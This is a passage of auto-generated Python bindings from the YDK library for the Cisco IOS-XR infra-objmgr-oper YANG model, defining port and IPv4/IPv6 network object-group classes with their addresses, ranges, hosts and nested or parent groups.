                    """

                    _prefix = 'infra-objmgr-oper'
                    _revision = '2017-05-01'

                    def __init__(self):
                        """Initialize a parent-group list entry (keyed by parent_group_name)."""
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup, self).__init__()

                        self.yang_name = "parent-group"
                        self.yang_parent_name = "parent-groups"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['parent_group_name']
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('parent_group_name', (YLeaf(YType.str, 'parent-group-name'), ['str'])),
                            ('parent_name', (YLeaf(YType.str, 'parent-name'), ['str'])),
                        ])
                        self.parent_group_name = None
                        self.parent_name = None
                        self._segment_path = lambda: "parent-group" + "[parent-group-name='" + str(self.parent_group_name) + "']"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup, ['parent_group_name', 'parent_name'], name, value)

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                        return meta._meta_table['ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                    return meta._meta_table['ObjectGroup.Port.Objects.Object.ParentGroups']['meta_info']

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
                return meta._meta_table['ObjectGroup.Port.Objects.Object']['meta_info']

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Port.Objects']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Port']['meta_info']
class Network(_Entity_):
"""
Network object group
.. attribute:: ipv6
IPv6 object group
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6>`
**config**\: False
.. attribute:: ipv4
IPv4 object group
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    """Build the network object-group container with its IPv6 and IPv4 children."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(ObjectGroup.Network, self).__init__()

    self.yang_name = "network"
    self.yang_parent_name = "object-group"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # YANG child name -> (python attribute, child class); order matters
    # to YDK's (de)serialization.
    self._child_classes = OrderedDict([("ipv6", ("ipv6", ObjectGroup.Network.Ipv6)), ("ipv4", ("ipv4", ObjectGroup.Network.Ipv4))])
    self._leafs = OrderedDict()

    self.ipv6 = ObjectGroup.Network.Ipv6()
    self.ipv6.parent = self
    self._children_name_map["ipv6"] = "ipv6"

    self.ipv4 = ObjectGroup.Network.Ipv4()
    self.ipv4.parent = self
    self._children_name_map["ipv4"] = "ipv4"
    self._segment_path = lambda: "network"
    self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/%s" % self._segment_path()
    # Freeze: further writes are validated by _perform_setattr.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Container has no settable leafs; validation only.
    self._perform_setattr(ObjectGroup.Network, [], name, value)
class Ipv6(_Entity_):
"""
IPv6 object group
.. attribute:: objects
Table of Object
**type**\: :py:class:`Objects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    """Build the IPv6 object-group container and its objects table."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(ObjectGroup.Network.Ipv6, self).__init__()

    self.yang_name = "ipv6"
    self.yang_parent_name = "network"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("objects", ("objects", ObjectGroup.Network.Ipv6.Objects))])
    self._leafs = OrderedDict()

    self.objects = ObjectGroup.Network.Ipv6.Objects()
    self.objects.parent = self
    self._children_name_map["objects"] = "objects"
    self._segment_path = lambda: "ipv6"
    self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    # Container has no settable leafs; validation only.
    self._perform_setattr(ObjectGroup.Network.Ipv6, [], name, value)
class Objects(_Entity_):
"""
Table of Object
.. attribute:: object
IPv6 object group
**type**\: list of :py:class:`Object <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    """Initialize the keyed list container of IPv6 object groups."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(ObjectGroup.Network.Ipv6.Objects, self).__init__()

    self.yang_name = "objects"
    self.yang_parent_name = "ipv6"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("object", ("object", ObjectGroup.Network.Ipv6.Objects.Object))])
    self._leafs = OrderedDict()

    # YList: ordered, key-aware list of Object entries.
    self.object = YList(self)
    self._segment_path = lambda: "objects"
    self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv6/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    # Container has no settable leafs; validation only.
    self._perform_setattr(ObjectGroup.Network.Ipv6.Objects, [], name, value)
class Object(_Entity_):
"""
IPv6 object group
.. attribute:: object_name (key)
IPv6 object group name \- maximum 64 characters
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_groups
Table of NestedGroup
**type**\: :py:class:`NestedGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups>`
**config**\: False
.. attribute:: addresses
Table of Address
**type**\: :py:class:`Addresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Addresses>`
**config**\: False
.. attribute:: address_ranges
Table of AddressRange
**type**\: :py:class:`AddressRanges <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges>`
**config**\: False
.. attribute:: parent_groups
Table of parent object group
**type**\: :py:class:`ParentGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups>`
**config**\: False
.. attribute:: hosts
Table of Host
**type**\: :py:class:`Hosts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Hosts>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    """Initialize an IPv6 object-group list entry (keyed by object_name)."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(ObjectGroup.Network.Ipv6.Objects.Object, self).__init__()

    self.yang_name = "object"
    self.yang_parent_name = "objects"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # object_name is the YANG list key.
    self.ylist_key_names = ['object_name']
    self._child_classes = OrderedDict([("nested-groups", ("nested_groups", ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups)), ("addresses", ("addresses", ObjectGroup.Network.Ipv6.Objects.Object.Addresses)), ("address-ranges", ("address_ranges", ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges)), ("parent-groups", ("parent_groups", ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups)), ("hosts", ("hosts", ObjectGroup.Network.Ipv6.Objects.Object.Hosts))])
    self._leafs = OrderedDict([
        ('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
    ])
    self.object_name = None

    self.nested_groups = ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups()
    self.nested_groups.parent = self
    self._children_name_map["nested_groups"] = "nested-groups"

    self.addresses = ObjectGroup.Network.Ipv6.Objects.Object.Addresses()
    self.addresses.parent = self
    self._children_name_map["addresses"] = "addresses"

    self.address_ranges = ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges()
    self.address_ranges.parent = self
    self._children_name_map["address_ranges"] = "address-ranges"

    self.parent_groups = ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups()
    self.parent_groups.parent = self
    self._children_name_map["parent_groups"] = "parent-groups"

    self.hosts = ObjectGroup.Network.Ipv6.Objects.Object.Hosts()
    self.hosts.parent = self
    self._children_name_map["hosts"] = "hosts"
    # Segment path embeds the list key as an XPath predicate.
    self._segment_path = lambda: "object" + "[object-name='" + str(self.object_name) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv6/objects/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    # object_name is the only directly settable leaf on this entry.
    self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object, ['object_name'], name, value)
class NestedGroups(_Entity_):
    """
    Table of NestedGroup

    .. attribute:: nested_group

        nested object group

        **type**\: list of :py:class:`NestedGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup>`

        **config**\: False
    """

    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        """Initialize the container of nested IPv6 object-group entries."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups, self).__init__()

        self.yang_name = "nested-groups"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        # An ancestor ('object') is a keyed list, so no static absolute
        # path can be generated for this node.
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("nested-group", ("nested_group", ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup))])
        self._leafs = OrderedDict()

        self.nested_group = YList(self)
        self._segment_path = lambda: "nested-groups"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups, [], name, value)


    class NestedGroup(_Entity_):
        """
        nested object group

        .. attribute:: nested_group_name (key)

            Enter the name of a nested object group

            **type**\: str

            **length:** 1..64

            **config**\: False

        .. attribute:: nested_group_name_xr

            Nested group

            **type**\: str

            **config**\: False
        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            """Initialize a nested-group list entry (keyed by nested_group_name)."""
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup, self).__init__()

            self.yang_name = "nested-group"
            self.yang_parent_name = "nested-groups"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['nested_group_name']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('nested_group_name', (YLeaf(YType.str, 'nested-group-name'), ['str'])),
                ('nested_group_name_xr', (YLeaf(YType.str, 'nested-group-name-xr'), ['str'])),
            ])
            self.nested_group_name = None
            self.nested_group_name_xr = None
            self._segment_path = lambda: "nested-group" + "[nested-group-name='" + str(self.nested_group_name) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup, ['nested_group_name', 'nested_group_name_xr'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups']['meta_info']
class Addresses(_Entity_):
    """
    Table of Address

    .. attribute:: address

        IPv6 address

        **type**\: list of :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv6.Objects.Object.Addresses, self).__init__()

        self.yang_name = "addresses"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("address", ("address", ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address))])
        self._leafs = OrderedDict()

        # YANG list "address": keyless list of Address entries.
        self.address = YList(self)
        self._segment_path = lambda: "addresses"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Addresses, [], name, value)


    class Address(_Entity_):
        """
        IPv6 address

        .. attribute:: prefix

            IPv6 prefix x\:x\:\:x/y

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: prefix_length

            Prefix of the IP Address

            **type**\: int

            **range:** 0..128

            **config**\: False

        .. attribute:: prefix_xr

            IPv6 address

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: prefix_length_xr

            Prefix length

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address, self).__init__()

            self.yang_name = "address"
            self.yang_parent_name = "addresses"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
                ('prefix_xr', (YLeaf(YType.str, 'prefix-xr'), ['str'])),
                ('prefix_length_xr', (YLeaf(YType.uint32, 'prefix-length-xr'), ['int'])),
            ])
            self.prefix = None
            self.prefix_length = None
            self.prefix_xr = None
            self.prefix_length_xr = None
            self._segment_path = lambda: "address"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address, ['prefix', 'prefix_length', 'prefix_xr', 'prefix_length_xr'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Addresses']['meta_info']
class AddressRanges(_Entity_):
    """
    Table of AddressRange

    .. attribute:: address_range

        Range of host addresses

        **type**\: list of :py:class:`AddressRange <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges, self).__init__()

        self.yang_name = "address-ranges"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("address-range", ("address_range", ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange))])
        self._leafs = OrderedDict()

        # YANG list "address-range": keyless list of AddressRange entries.
        self.address_range = YList(self)
        self._segment_path = lambda: "address-ranges"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges, [], name, value)


    class AddressRange(_Entity_):
        """
        Range of host addresses

        .. attribute:: start_address

            IPv6 address

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: end_address

            IPv6 address

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: start_address_xr

            Range start address

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: end_address_xr

            Range end address

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange, self).__init__()

            self.yang_name = "address-range"
            self.yang_parent_name = "address-ranges"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('start_address', (YLeaf(YType.str, 'start-address'), ['str'])),
                ('end_address', (YLeaf(YType.str, 'end-address'), ['str'])),
                ('start_address_xr', (YLeaf(YType.str, 'start-address-xr'), ['str'])),
                ('end_address_xr', (YLeaf(YType.str, 'end-address-xr'), ['str'])),
            ])
            self.start_address = None
            self.end_address = None
            self.start_address_xr = None
            self.end_address_xr = None
            self._segment_path = lambda: "address-range"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange, ['start_address', 'end_address', 'start_address_xr', 'end_address_xr'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges']['meta_info']
class ParentGroups(_Entity_):
    """
    Table of parent object group

    .. attribute:: parent_group

        Parent object group

        **type**\: list of :py:class:`ParentGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups, self).__init__()

        self.yang_name = "parent-groups"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("parent-group", ("parent_group", ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup))])
        self._leafs = OrderedDict()

        # YANG list "parent-group": entries are ParentGroup instances.
        self.parent_group = YList(self)
        self._segment_path = lambda: "parent-groups"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups, [], name, value)


    class ParentGroup(_Entity_):
        """
        Parent object group

        .. attribute:: parent_group_name (key)

            Nested object group

            **type**\: str

            **length:** 1..64

            **config**\: False

        .. attribute:: parent_name

            Parent node

            **type**\: str

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup, self).__init__()

            self.yang_name = "parent-group"
            self.yang_parent_name = "parent-groups"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['parent_group_name']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('parent_group_name', (YLeaf(YType.str, 'parent-group-name'), ['str'])),
                ('parent_name', (YLeaf(YType.str, 'parent-name'), ['str'])),
            ])
            self.parent_group_name = None
            self.parent_name = None
            # XPath segment keyed on the list-key leaf parent-group-name.
            self._segment_path = lambda: "parent-group" + "[parent-group-name='" + str(self.parent_group_name) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup, ['parent_group_name', 'parent_name'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups']['meta_info']
class Hosts(_Entity_):
    """
    Table of Host

    .. attribute:: host

        A single host address

        **type**\: list of :py:class:`Host <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host>`

        **config**\: False

    """

    # YANG module prefix/revision this binding was generated from.
    _prefix = 'infra-objmgr-oper'
    _revision = '2017-05-01'

    def __init__(self):
        # Generated initializer -- keep assignment order; _is_frozen last.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(ObjectGroup.Network.Ipv6.Objects.Object.Hosts, self).__init__()

        self.yang_name = "hosts"
        self.yang_parent_name = "object"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("host", ("host", ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host))])
        self._leafs = OrderedDict()

        # YANG list "host": entries are Host instances.
        self.host = YList(self)
        self._segment_path = lambda: "hosts"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Hosts, [], name, value)


    class Host(_Entity_):
        """
        A single host address

        .. attribute:: host_address (key)

            host ipv6 address

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: host_address_xr

            Host address

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False

        """

        _prefix = 'infra-objmgr-oper'
        _revision = '2017-05-01'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host, self).__init__()

            self.yang_name = "host"
            self.yang_parent_name = "hosts"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['host_address']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('host_address', (YLeaf(YType.str, 'host-address'), ['str'])),
                ('host_address_xr', (YLeaf(YType.str, 'host-address-xr'), ['str'])),
            ])
            self.host_address = None
            self.host_address_xr = None
            # XPath segment keyed on the list-key leaf host-address.
            self._segment_path = lambda: "host" + "[host-address='" + str(self.host_address) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host, ['host_address', 'host_address_xr'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
            return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
        return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Hosts']['meta_info']
@staticmethod
def _meta_info():
    """Return the generator's meta-info record for this entity class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
    entry = meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generator's meta-info record for this entity class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
    entry = meta._meta_table['ObjectGroup.Network.Ipv6.Objects']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generator's meta-info record for this entity class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
    entry = meta._meta_table['ObjectGroup.Network.Ipv6']
    return entry['meta_info']
class Ipv4(_Entity_):
"""
IPv4 object group
.. attribute:: objects
Table of Object
**type**\: :py:class:`Objects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4.Objects>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
    # Generated initializer for the "ipv4" container -- keep assignment
    # order; _is_frozen must stay the last assignment (it appears to gate
    # attribute creation via the overridden __setattr__ -- TODO confirm).
    if sys.version_info > (3,):
        # Python 2/3 compatible super() call emitted by the generator.
        super().__init__()
    else:
        super(ObjectGroup.Network.Ipv4, self).__init__()

    self.yang_name = "ipv4"
    self.yang_parent_name = "network"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("objects", ("objects", ObjectGroup.Network.Ipv4.Objects))])
    self._leafs = OrderedDict()

    # Single child container "objects".
    self.objects = ObjectGroup.Network.Ipv4.Objects()
    self.objects.parent = self
    self._children_name_map["objects"] = "objects"

    self._segment_path = lambda: "ipv4"
    self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    """Intercept attribute writes and route them through YDK's guarded setter."""
    leaf_names = []
